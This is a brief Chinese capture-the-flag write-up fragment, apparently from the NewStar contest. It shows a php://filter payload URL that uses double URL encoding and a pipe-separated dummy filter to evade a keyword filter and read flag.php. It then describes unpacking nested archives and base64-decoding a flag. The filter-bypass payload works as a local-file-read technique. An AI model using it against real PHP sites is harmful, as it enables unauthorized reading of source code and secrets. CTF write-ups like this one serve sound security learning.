第二层使用伪协议,php://filter/协议自带一层url解码,这样双层url编码可以绕这里的过滤,至于NewStar关键字可以用管道符分隔开用作过滤器(错误的过滤器也不会报错) /?file=php://filter/read=convert.ba%25%37%33e64-encode|NewStar/resource=flag.php guess=1202031004 1. 2. 3. PS C:\Users\Administrator\...
flag文件是个压缩包,LZMA2的压缩方法,解压之后又是个压缩包换了个压缩方法,本来以为是压缩包套娃,正准备先看有哪些压缩方法,先解压几次看看,结果解压到第6次,就得到secret.jpg,但是flag在最后一次解压的压缩包末尾。 PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3tJX3IzYWxseV9XYW50X...